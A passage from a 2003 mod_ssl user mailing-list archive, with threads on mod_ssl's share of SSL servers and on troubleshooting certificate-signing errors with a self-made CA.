/hgZ/TQCAfoPAQAAABAAAAA0HJ4SjjioQ4cp6P4YGf00AgH7DwEAAACeAAAAAAAAADihuxAF5RAa
obsIACsqVsIAAFBTVFBSWC5ETEwAAAAAAAAAAE5JVEH5v7gBAKoAN9luAAAAQzpcRG9jdW1lbnRz
IGFuZCBTZXR0aW5nc1xPbXIgVEFOVEFPVUlcTG9jYWwgU2V0dGluZ3NcQXBwbGljYXRpb24gRGF0
YVxNaWNyb3NvZnRcT3V0bG9va1xvdXRsb29rLnBzdAAAAAMA/g8FAAAAAwANNP03AAACAX8AAQAA
ADcAAAA8S0lFRElIQ0pOTU9DSUdBTEhEQU1BRVBBQ0FBQS5vbWFyLnRhbnRhb3VpQGF0ZXhvLmNv
bT4AAAMABhAXh47IAwAHEKwGAAADABAQAAAAAAMAERAAAAAAHgAIEAEAAABlAAAASElFVkVSWUJP
RFksSUFNVVNJTkdBUEFDSEUtMTMyN1dJVEhNT0RTU0wtMjgxMkFORE9QRU5TU0wtMDk3SUhBVkVD
UkVBVEVEQVNFQ1VSRUFSRUFUSEFUUkVRVUlSRVNDTElFTgAAAABuvQ==

------=_NextPart_000_0002_01C2C911.41B0D490--


______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Jan 31 15:31:48 2003
Return-Path: 
Delivered-To: modssl-users-l@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 1DE282AA09E; Fri, 31 Jan 2003 15:31:48 +0100 (CET)
Delivered-To: modssl-users@modssl.org
Received: from scgis.com (adsl-068-016-197-035.sip.cae.bellsouth.net [68.16.197.35])
	by master.modssl.org (Postfix) with ESMTP id BDAB12AA086
	for ; Fri, 31 Jan 2003 15:31:45 +0100 (CET)
Received: from crash (adsl-068-016-197-034.sip.cae.bellsouth.net [68.16.197.34] (may be forged))
	by scgis.com (8.12.6/8.12.6) with SMTP id h0VEVdrt037135
	for ; Fri, 31 Jan 2003 09:31:39 -0500 (EST)
	(envelope-from cdavis@scgis.com)
Message-ID: <00c701c2c935$d90442e0$0301010a@crash>
From: "Chris Davis" 
To: 
Subject: modssl versus other ssl servers
Date: Fri, 31 Jan 2003 09:34:17 -0500
MIME-Version: 1.0
Content-Type: text/plain;
	charset="iso-8859-1"
Content-Transfer-Encoding: 7bit
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 6.00.2800.1106
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2800.1106
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Chris Davis" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Hi,

  Does anyone know how many modssl installations there are versus
  other SSL servers?  I'd like to know what percentage of SSL sites
  use modssl. 

 Thanks,  Chris

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Jan 31 15:48:25 2003
Return-Path: 
Delivered-To: modssl-users-l@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id F101F2AA09E; Fri, 31 Jan 2003 15:48:24 +0100 (CET)
Delivered-To: modssl-users@modssl.org
Received: from maggotts.rnib.org.uk (maggotts.rnib.org.uk [194.128.16.48])
	by master.modssl.org (Postfix) with ESMTP id 29F1F2AA086
	for ; Fri, 31 Jan 2003 15:48:23 +0100 (CET)
Received: from pboroweb.rnib.org.uk (pboroweb.rnib.org.uk [194.128.16.17])
	by maggotts.rnib.org.uk (8.11.6/8.11.6) with ESMTP id h0VEqm625691
	for ; Fri, 31 Jan 2003 14:53:09 GMT
Received: by pboroweb.rnib.org.uk with Internet Mail Service (5.5.2650.21)
	id ; Fri, 31 Jan 2003 14:47:37 -0000
Message-ID: <9B66BBD37D5DD411B8CE00508B69700F033F261A@pborolocal.rnib.org.uk>
From: John.Airey@rnib.org.uk
To: modssl-users@modssl.org
Subject: RE: modssl versus other ssl servers
Date: Fri, 31 Jan 2003 14:47:36 -0000
MIME-Version: 1.0
X-Mailer: Internet Mail Service (5.5.2650.21)
Content-Type: text/plain;
	charset="iso-8859-1"
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: John.Airey@rnib.org.uk
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

For just under $2000, Security space will give you a report on it.

http://www.securityspace.com/s_survey/payrepdetail.html?ym=200212&cat=Apache
Tech&repid=10903

(Which explains why the links on the modssl site to statistics are out of
date).

- 
John Airey, BSc (Jt Hons), CNA, RHCE
Internet systems support officer, ITCSD, Royal National Institute of the
Blind,
Bakewell Road, Peterborough PE2 6XU,
Tel.: +44 (0) 1733 375299 Fax: +44 (0) 1733 370848 John.Airey@rnib.org.uk 

Nearly everything we believe is second hand. For example, less than 500
people have seen the Earth from space, yet the majority of people believe it
is round (OK pedants, an oblate sphere).


> -----Original Message-----
> From: Chris Davis [mailto:cdavis@scgis.com]
> Sent: 31 January 2003 14:34
> To: modssl-users@modssl.org
> Subject: modssl versus other ssl servers
> 
> 
> Hi,
> 
>   Does anyone know how many modssl installations there are versus
>   other SSL servers?  I'd like to know what percentage of SSL sites
>   use modssl. 
> 
>  Thanks,  Chris
> 
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org
> 

- 

NOTICE: The information contained in this email and any attachments is 
confidential and may be legally privileged. If you are not the 
intended recipient you are hereby notified that you must not use, 
disclose, distribute, copy, print or rely on this email's content. If 
you are not the intended recipient, please notify the sender 
immediately and then delete the email and any attachments from your 
system.

RNIB has made strenuous efforts to ensure that emails and any 
attachments generated by its staff are free from viruses. However, it 
cannot accept any responsibility for any viruses which are 
transmitted. We therefore recommend you scan all attachments.

Please note that the statements and views expressed in this email 
and any attachments are those of the author and do not necessarily 
represent those of RNIB.

RNIB Registered Charity Number: 226227

Website: http://www.rnib.org.uk 
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Jan 31 15:50:12 2003
Return-Path: 
Delivered-To: modssl-users-l@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 5226D2AA0B7; Fri, 31 Jan 2003 15:50:12 +0100 (CET)
Delivered-To: modssl-users@modssl.org
Received: from maggotts.rnib.org.uk (maggotts.rnib.org.uk [194.128.16.48])
	by master.modssl.org (Postfix) with ESMTP id C96062AA09D
	for ; Fri, 31 Jan 2003 15:50:10 +0100 (CET)
Received: from pboroweb.rnib.org.uk (pboroweb.rnib.org.uk [194.128.16.17])
	by maggotts.rnib.org.uk (8.11.6/8.11.6) with ESMTP id h0VEsu625848
	for ; Fri, 31 Jan 2003 14:55:01 GMT
Received: by pboroweb.rnib.org.uk with Internet Mail Service (5.5.2650.21)
	id ; Fri, 31 Jan 2003 14:49:45 -0000
Message-ID: <9B66BBD37D5DD411B8CE00508B69700F033F261B@pborolocal.rnib.org.uk>
From: John.Airey@rnib.org.uk
To: modssl-users@modssl.org
Subject: RE: modssl versus other ssl servers
Date: Fri, 31 Jan 2003 14:49:45 -0000
MIME-Version: 1.0
X-Mailer: Internet Mail Service (5.5.2650.21)
Content-Type: text/plain;
	charset="iso-8859-1"
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: John.Airey@rnib.org.uk
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Oops, my mistake. The page
http://www.securityspace.com/s_survey/payrepdetail.html?ym=200212&cat=Apache
Tech&repid=10903 says 1.4 million mod_ssl sites out of 5.3 million Apache
sites. 

I'd reckon that mod_ssl is the number one secure server on the 'net.

- 
John Airey, BSc (Jt Hons), CNA, RHCE
Internet systems support officer, ITCSD, Royal National Institute of the
Blind,
Bakewell Road, Peterborough PE2 6XU,
Tel.: +44 (0) 1733 375299 Fax: +44 (0) 1733 370848 John.Airey@rnib.org.uk 

Nearly everything we believe is second hand. For example, less than 500
people have seen the Earth from space, yet the majority of people believe it
is round (OK pedants, an oblate sphere).

> -----Original Message-----
> From: Chris Davis [mailto:cdavis@scgis.com]
> Sent: 31 January 2003 14:34
> To: modssl-users@modssl.org
> Subject: modssl versus other ssl servers
> 
> 
> Hi,
> 
>   Does anyone know how many modssl installations there are versus
>   other SSL servers?  I'd like to know what percentage of SSL sites
>   use modssl. 
> 
>  Thanks,  Chris
> 
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org
> 

- 

NOTICE: The information contained in this email and any attachments is 
confidential and may be legally privileged. If you are not the 
intended recipient you are hereby notified that you must not use, 
disclose, distribute, copy, print or rely on this email's content. If 
you are not the intended recipient, please notify the sender 
immediately and then delete the email and any attachments from your 
system.

RNIB has made strenuous efforts to ensure that emails and any 
attachments generated by its staff are free from viruses. However, it 
cannot accept any responsibility for any viruses which are 
transmitted. We therefore recommend you scan all attachments.

Please note that the statements and views expressed in this email 
and any attachments are those of the author and do not necessarily 
represent those of RNIB.

RNIB Registered Charity Number: 226227

Website: http://www.rnib.org.uk 
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Jan 31 16:41:10 2003
Return-Path: 
Delivered-To: modssl-users-l@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id F0BAA2AA081; Fri, 31 Jan 2003 16:41:09 +0100 (CET)
Delivered-To: modssl-users@modssl.org
Received: from darkstar.sysinfo.com (darkstar.sysinfo.com [209.170.144.33])
	by master.modssl.org (Postfix) with ESMTP id A74942AA086
	for ; Fri, 31 Jan 2003 16:41:04 +0100 (CET)
Received: from blackhole.sysinfo.com (dufresne@blackhole.sysinfo.com [209.170.142.145])
	by darkstar.sysinfo.com (8.9.1/8.9.1) with ESMTP id KAA14097
	for ; Fri, 31 Jan 2003 10:39:43 -0500
Date: Fri, 31 Jan 2003 10:39:42 -0500 (EST)
From: "R. DuFresne" 
To: modssl-users@modssl.org
Subject: Re: modssl versus other ssl servers
In-Reply-To: <00c701c2c935$d90442e0$0301010a@crash>
Message-ID: 
Organization: sysinfo.com
X-Subliminal: If at first you don't suck seed...
X-Admonition: The Good thing about potential is
X-Admonition2: as long as you do nothing
X-Admonition3: you'll always have it.
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "R. DuFresne" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users


Any answer you get will probably be a best guess.  The closest stat on
modssl use might relate somewhat to the number of list memebers here,
though, even that number will not be fully definative as some folks use
more then one product, some onlyread the list and not really have modssl
up and running, etc...

Thanks,

Ron DuFresne


On Fri, 31 Jan 2003, Chris Davis wrote:

> Hi,
> 
>   Does anyone know how many modssl installations there are versus
>   other SSL servers?  I'd like to know what percentage of SSL sites
>   use modssl. 
> 
>  Thanks,  Chris
> 
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org
> 

-- 
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
        admin & senior security consultant:  sysinfo.com
                        http://sysinfo.com

"Cutting the space budget really restores my faith in humanity.  It
eliminates dreams, goals, and ideals and lets us get straight to the
business of hate, debauchery, and self-annihilation."
                -- Johnny Hart

testing, only testing, and damn good at it too!

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Jan 31 18:01:09 2003
Return-Path: 
Delivered-To: modssl-users-l@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id BA29D2AA09E; Fri, 31 Jan 2003 18:01:08 +0100 (CET)
Delivered-To: modssl-users@modssl.org
Received: from mailhub.fokus.gmd.de (mailhub.fokus.gmd.de [193.174.154.14])
	by master.modssl.org (Postfix) with ESMTP id 285A82AA086
	for ; Fri, 31 Jan 2003 18:01:07 +0100 (CET)
Received: from fokus.fraunhofer.de (sol [193.174.154.20])
	by mailhub.fokus.gmd.de (8.11.6/8.11.6) with ESMTP id h0VH10i00508
	for ; Fri, 31 Jan 2003 18:01:00 +0100 (MET)
Message-ID: <3E3AABCB.2060405@fokus.fraunhofer.de>
Date: Fri, 31 Jan 2003 18:00:59 +0100
From: Aihong Yin 
Organization: FOKUS
User-Agent: Mozilla/5.0 (X11; U; SunOS sun4u; en-US; rv:0.9.4.1) Gecko/20020406 Netscape6/6.2.2
X-Accept-Language: en-us
MIME-Version: 1.0
To: modssl-users@modssl.org
Subject: Re: autosigning certificate
References: <1F6B1C04A612D311B27400A0C9ECE51202A1CAB1@NAWNT02.naples.eur.slb.com>
Content-Type: text/plain; charset=us-ascii; format=flowed
Content-Transfer-Encoding: 7bit
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Aihong Yin 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Hello Zampognaro,

>Hi all,
>I tried to use my own CA in order to sign the CSR previously produced.
>Following what I got:
>
>[naunx04:aspprod] /home/aspprod/aspapp/mySSL/openSSL/bin> ./sign.sh
>server.csr
>CA signing: server.csr -> server.crt:
>Using configuration from ca.config
>Enter pass phrase for ./ca.key:
>Check that the request matches the signature
>Signature ok
>The Subject's Distinguished Name is as follows
>countryName           :PRINTABLE:'IT'
>stateOrProvinceName   :PRINTABLE:'Napoli'
>localityName          :PRINTABLE:'Pozzuoli'
>organizationName      :PRINTABLE:'SchlumbergerSema'
>organizationalUnitName:PRINTABLE:'EAI'
>commonName            :PRINTABLE:'naunx04:8443'
>emailAddress          :IA5STRING:'szampognaro@slb.com'
>Certificate is to be certified until Jan 29 17:29:55 2004 GMT (365 days)
>Sign the certificate? [y/n]:y
>
>
>1 out of 1 certificate requests certified, commit? [y/n]y
>Write out database with 1 new entries
>Data Base Updated
>CA verifying: server.crt <-> CA cert
>server.crt:
>/C=IT/ST=Napoli/L=Pozzuoli/O=SchlumbergerSema/OU=EAI/CN=naunx04:8443/emailAd
>dress=szampognaro@slb.com
>error 18 at 0 depth lookup:self signed certificate
>/C=IT/ST=Napoli/L=Pozzuoli/O=SchlumbergerSema/OU=EAI/CN=naunx04:8443/emailAd
>dress=szampognaro@slb.com
>error 7 at 0 depth lookup:certificate signature failure
>[naunx04:aspprod] /home/aspprod/aspapp/mySSL/openSSL/bin>
>
>I see 2 ERRORS:
>error 18 at 0 depth lookup:self signed certificate
>error 7 at 0 depth lookup:certificate signature failure
>
>What they means? The certificate signing process is ok or not?
>
The certificate signing process is not ok!
Are you using openssl-2.9.6g? Please try it again with openssl-2.9.7.

I hope this mail is not too late for you!

Cheers,
Aihong Yin.



______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Jan 31 18:18:03 2003
Return-Path: 
Delivered-To: modssl-users-l@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 075522AA09E; Fri, 31 Jan 2003 18:18:02 +0100 (CET)
Delivered-To: modssl-users@modssl.org
Received: from mail.slb.com (eurmta01.london.eur.slb.com [134.32.26.55])
	by master.modssl.org (Postfix) with ESMTP id B04EC2AA086
	for ; Fri, 31 Jan 2003 18:18:01 +0100 (CET)
Received: from conversion-daemon.eurmta01.london.eur.slb.com by
 eurmta01.london.eur.slb.com
 (iPlanet Messaging Server 5.2 HotFix 1.02 (built Sep 16 2002))
 id <0H9L00F018YE7D@eurmta01.london.eur.slb.com> for modssl-users@modssl.org;
 Fri, 31 Jan 2003 17:17:56 +0000 (GMT)
Received: from nawnt02.naples.eur.slb.com
 (NAWNT02.naples.eur.slb.com [134.32.195.212]) by eurmta01.london.eur.slb.com
 (iPlanet Messaging Server 5.2 HotFix 1.02 (built Sep 16 2002))
 with ESMTP id <0H9L00EPX9BVPI@eurmta01.london.eur.slb.com>; Fri,
 31 Jan 2003 17:16:43 +0000 (GMT)
Received: by NAWNT02.naples.eur.slb.com with Internet Mail Service
 (5.5.2653.19)	id ; Fri, 31 Jan 2003 18:16:10 +0100
Content-return: allowed
Date: Fri, 31 Jan 2003 18:16:09 +0100
From: Zampognaro Sergio 
Subject: RE: autosigning certificate
To: modssl-users@modssl.org
Cc: yin@fokus.fraunhofer.de
Message-id:
 <1F6B1C04A612D311B27400A0C9ECE51202A4A354@NAWNT02.naples.eur.slb.com>
MIME-version: 1.0
X-Mailer: Internet Mail Service (5.5.2653.19)
Content-type: text/plain; charset=iso-8859-1
Content-transfer-encoding: quoted-printable
Importance: high
X-Priority: 1
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Zampognaro Sergio 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Hi,
I'm using openssl-0.9.7!
any other suggestions?

thanks
Sergio.

-----Original Message-----
From: Aihong Yin [mailto:yin@fokus.fraunhofer.de]
Sent: venerd=EC 31 gennaio 2003 18.01
To: modssl-users@modssl.org
Subject: Re: autosigning certificate


Hello Zampognaro,

>Hi all,
>I tried to use my own CA in order to sign the CSR previously produced.
>Following what I got:
>
>[naunx04:aspprod] /home/aspprod/aspapp/mySSL/openSSL/bin> ./sign.sh
>server.csr
>CA signing: server.csr -> server.crt:
>Using configuration from ca.config
>Enter pass phrase for ./ca.key:
>Check that the request matches the signature
>Signature ok
>The Subject's Distinguished Name is as follows
>countryName           :PRINTABLE:'IT'
>stateOrProvinceName   :PRINTABLE:'Napoli'
>localityName          :PRINTABLE:'Pozzuoli'
>organizationName      :PRINTABLE:'SchlumbergerSema'
>organizationalUnitName:PRINTABLE:'EAI'
>commonName            :PRINTABLE:'naunx04:8443'
>emailAddress          :IA5STRING:'szampognaro@slb.com'
>Certificate is to be certified until Jan 29 17:29:55 2004 GMT (365 =
days)
>Sign the certificate? [y/n]:y
>
>
>1 out of 1 certificate requests certified, commit? [y/n]y
>Write out database with 1 new entries
>Data Base Updated
>CA verifying: server.crt <-> CA cert
>server.crt:
>/C=3DIT/ST=3DNapoli/L=3DPozzuoli/O=3DSchlumbergerSema/OU=3DEAI/CN=3Dnau=
nx04:8443/emailA
d
>dress=3Dszampognaro@slb.com
>error 18 at 0 depth lookup:self signed certificate
>/C=3DIT/ST=3DNapoli/L=3DPozzuoli/O=3DSchlumbergerSema/OU=3DEAI/CN=3Dnau=
nx04:8443/emailA
d
>dress=3Dszampognaro@slb.com
>error 7 at 0 depth lookup:certificate signature failure
>[naunx04:aspprod] /home/aspprod/aspapp/mySSL/openSSL/bin>
>
>I see 2 ERRORS:
>error 18 at 0 depth lookup:self signed certificate
>error 7 at 0 depth lookup:certificate signature failure
>
>What they means? The certificate signing process is ok or not?
>
The certificate signing process is not ok!
Are you using openssl-2.9.6g? Please try it again with openssl-2.9.7.

I hope this mail is not too late for you!

Cheers,
Aihong Yin.



______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Jan 31 20:07:27 2003
Return-Path: 
Delivered-To: modssl-users-l@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 868BF2AA09E; Fri, 31 Jan 2003 20:07:27 +0100 (CET)
Delivered-To: modssl-users@modssl.org
Received: from mailhub.fokus.gmd.de (mailhub.fokus.gmd.de [193.174.154.14])
	by master.modssl.org (Postfix) with ESMTP id 438E12AA086
	for ; Fri, 31 Jan 2003 20:07:21 +0100 (CET)
Received: from fokus.fraunhofer.de (sol [193.174.154.20])
	by mailhub.fokus.gmd.de (8.11.6/8.11.6) with ESMTP id h0VJ7Fi13509
	for ; Fri, 31 Jan 2003 20:07:16 +0100 (MET)
Message-ID: <3E3AC963.5030003@fokus.fraunhofer.de>
Date: Fri, 31 Jan 2003 20:07:15 +0100
From: Aihong Yin 
Organization: FOKUS
User-Agent: Mozilla/5.0 (X11; U; SunOS sun4u; en-US; rv:0.9.4.1) Gecko/20020406 Netscape6/6.2.2
X-Accept-Language: en-us
MIME-Version: 1.0
To: modssl-users@modssl.org
Subject: Re: autosigning certificate
References: <1F6B1C04A612D311B27400A0C9ECE51202A4A354@NAWNT02.naples.eur.slb.com>
Content-Type: text/plain; charset=ISO-8859-1; format=flowed
Content-Transfer-Encoding: 8bit
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Aihong Yin 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Hello Zampognaro,

>I'm using openssl-0.9.7!
>any other suggestions?
>
I'm not sure whether I can help you.

Are the "Common Name" in your self-signed CA certificate and server 
certificate the same?
Please try to give the difference names for them!

Cheers,
Aihong Yin.



>-----Original Message-----
>From: Aihong Yin [mailto:yin@fokus.fraunhofer.de]
>Sent: venerdì 31 gennaio 2003 18.01
>To: modssl-users@modssl.org
>Subject: Re: autosigning certificate
>
>
>Hello Zampognaro,
>
>>Hi all,
>>I tried to use my own CA in order to sign the CSR previously produced.
>>Following what I got:
>>
>>[naunx04:aspprod] /home/aspprod/aspapp/mySSL/openSSL/bin> ./sign.sh
>>server.csr
>>CA signing: server.csr -> server.crt:
>>Using configuration from ca.config
>>Enter pass phrase for ./ca.key:
>>Check that the request matches the signature
>>Signature ok
>>The Subject's Distinguished Name is as follows
>>countryName           :PRINTABLE:'IT'
>>stateOrProvinceName   :PRINTABLE:'Napoli'
>>localityName          :PRINTABLE:'Pozzuoli'
>>organizationName      :PRINTABLE:'SchlumbergerSema'
>>organizationalUnitName:PRINTABLE:'EAI'
>>commonName            :PRINTABLE:'naunx04:8443'
>>emailAddress          :IA5STRING:'szampognaro@slb.com'
>>Certificate is to be certified until Jan 29 17:29:55 2004 GMT (365 days)
>>Sign the certificate? [y/n]:y
>>
>>
>>1 out of 1 certificate requests certified, commit? [y/n]y
>>Write out database with 1 new entries
>>Data Base Updated
>>CA verifying: server.crt <-> CA cert
>>server.crt:
>>/C=IT/ST=Napoli/L=Pozzuoli/O=SchlumbergerSema/OU=EAI/CN=naunx04:8443/emailA
>>
>d
>
>>dress=szampognaro@slb.com
>>error 18 at 0 depth lookup:self signed certificate
>>/C=IT/ST=Napoli/L=Pozzuoli/O=SchlumbergerSema/OU=EAI/CN=naunx04:8443/emailA
>>
>d
>
>>dress=szampognaro@slb.com
>>error 7 at 0 depth lookup:certificate signature failure
>>[naunx04:aspprod] /home/aspprod/aspapp/mySSL/openSSL/bin>
>>
>>I see 2 ERRORS:
>>error 18 at 0 depth lookup:self signed certificate
>>error 7 at 0 depth lookup:certificate signature failure
>>
>>What they means? The certificate signing process is ok or not?
>>
>The certificate signing process is not ok!
>Are you using openssl-2.9.6g? Please try it again with openssl-2.9.7.
>
>I hope this mail is not too late for you!
>
>Cheers,
>Aihong Yin.
>
>
>
>______________________________________________________________________
>Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
>User Support Mailing List                      modssl-users@modssl.org
>Automated List Manager                            majordomo@modssl.org
>______________________________________________________________________
>Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
>User Support Mailing List                      modssl-users@modssl.org
>Automated List Manager                            majordomo@modssl.org
>

-- 




 



______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Jan 31 20:19:58 2003
Return-Path: 
Delivered-To: modssl-users-l@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 2BC532AA09E; Fri, 31 Jan 2003 20:19:58 +0100 (CET)
Delivered-To: modssl-users@modssl.org
Received: from mailhub.fokus.gmd.de (mailhub.fokus.gmd.de [193.174.154.14])
	by master.modssl.org (Postfix) with ESMTP id CCF202AA086
	for ; Fri, 31 Jan 2003 20:19:55 +0100 (CET)
Received: from fokus.fraunhofer.de (sol [193.174.154.20])
	by mailhub.fokus.gmd.de (8.11.6/8.11.6) with ESMTP id h0VJJoi14760
	for ; Fri, 31 Jan 2003 20:19:51 +0100 (MET)
Message-ID: <3E3ACC56.5050507@fokus.fraunhofer.de>
Date: Fri, 31 Jan 2003 20:19:50 +0100
From: Aihong Yin 
Organization: FOKUS
User-Agent: Mozilla/5.0 (X11; U; SunOS sun4u; en-US; rv:0.9.4.1) Gecko/20020406 Netscape6/6.2.2
X-Accept-Language: en-us
MIME-Version: 1.0
To: modssl-users@modssl.org
Subject: Re: autosigning certificate
References: <1F6B1C04A612D311B27400A0C9ECE51202A4A354@NAWNT02.naples.eur.slb.com> <3E3AC963.5030003@fokus.fraunhofer.de>
Content-Type: text/plain; charset=ISO-8859-1; format=flowed
Content-Transfer-Encoding: 8bit
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Aihong Yin 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users


Aihong Yin wrote:

> Hello Zampognaro,
>
>> I'm using openssl-0.9.7!
>> any other suggestions?
>>
> I'm not sure whether I can help you.
>
> Are the "Common Name" in your self-signed CA certificate and server 
> certificate the same?
> Please try to give the difference names for them! 

Not the "Common Name". The "Organizational Unit Name" should be 
different. I'm sorry for that!

Cheers,
Aihong Yin.

>> -----Original Message-----
>> From: Aihong Yin [mailto:yin@fokus.fraunhofer.de]
>> Sent: venerdì 31 gennaio 2003 18.01
>> To: modssl-users@modssl.org
>> Subject: Re: autosigning certificate
>>
>>
>> Hello Zampognaro,
>>
>>> Hi all,
>>> I tried to use my own CA in order to sign the CSR previously produced.
>>> Following what I got:
>>>
>>> [naunx04:aspprod] /home/aspprod/aspapp/mySSL/openSSL/bin> ./sign.sh
>>> server.csr
>>> CA signing: server.csr -> server.crt:
>>> Using configuration from ca.config
>>> Enter pass phrase for ./ca.key:
>>> Check that the request matches the signature
>>> Signature ok
>>> The Subject's Distinguished Name is as follows
>>> countryName           :PRINTABLE:'IT'
>>> stateOrProvinceName   :PRINTABLE:'Napoli'
>>> localityName          :PRINTABLE:'Pozzuoli'
>>> organizationName      :PRINTABLE:'SchlumbergerSema'
>>> organizationalUnitName:PRINTABLE:'EAI'
>>> commonName            :PRINTABLE:'naunx04:8443'
>>> emailAddress          :IA5STRING:'szampognaro@slb.com'
>>> Certificate is to be certified until Jan 29 17:29:55 2004 GMT (365 
>>> days)
>>> Sign the certificate? [y/n]:y
>>>
>>>
>>> 1 out of 1 certificate requests certified, commit? [y/n]y
>>> Write out database with 1 new entries
>>> Data Base Updated
>>> CA verifying: server.crt <-> CA cert
>>> server.crt:
>>> /C=IT/ST=Napoli/L=Pozzuoli/O=SchlumbergerSema/OU=EAI/CN=naunx04:8443/emailA 
>>>
>>>
>> d
>>
>>> dress=szampognaro@slb.com
>>> error 18 at 0 depth lookup:self signed certificate
>>> /C=IT/ST=Napoli/L=Pozzuoli/O=SchlumbergerSema/OU=EAI/CN=naunx04:8443/emailA 
>>>
>>>
>> d
>>
>>> dress=szampognaro@slb.com
>>> error 7 at 0 depth lookup:certificate signature failure
>>> [naunx04:aspprod] /home/aspprod/aspapp/mySSL/openSSL/bin>
>>>
>>> I see 2 ERRORS:
>>> error 18 at 0 depth lookup:self signed certificate
>>> error 7 at 0 depth lookup:certificate signature failure
>>>
>>> What they means? The certificate signing process is ok or not?
>>>
>> The certificate signing process is not ok!
>> Are you using openssl-2.9.6g? Please try it again with openssl-2.9.7.
>>
>> I hope this mail is not too late for you!
>>
>> Cheers,
>> Aihong Yin.
>>
>>
>>
>> ______________________________________________________________________
>> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
>> User Support Mailing List                      modssl-users@modssl.org
>> Automated List Manager                            majordomo@modssl.org
>> ______________________________________________________________________
>> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
>> User Support Mailing List                      modssl-users@modssl.org
>> Automated List Manager                            majordomo@modssl.org
>>
>

-- 




 



______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Jan 31 22:13:18 2003
Return-Path: 
Delivered-To: modssl-users-l@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 555402AA09E; Fri, 31 Jan 2003 22:13:18 +0100 (CET)
Delivered-To: modssl-users@modssl.org
Received: from smtp.inphact.com (smtp.inphact.com [67.105.52.11])
	by master.modssl.org (Postfix) with ESMTP id 102EB2AA086
	for ; Fri, 31 Jan 2003 22:13:17 +0100 (CET)
Received: from cafes.net (unknown [192.168.109.38])
	by smtp.inphact.com (Postfix) with ESMTP id 268A4134002
	for ; Fri, 31 Jan 2003 14:57:30 -0600 (CST)
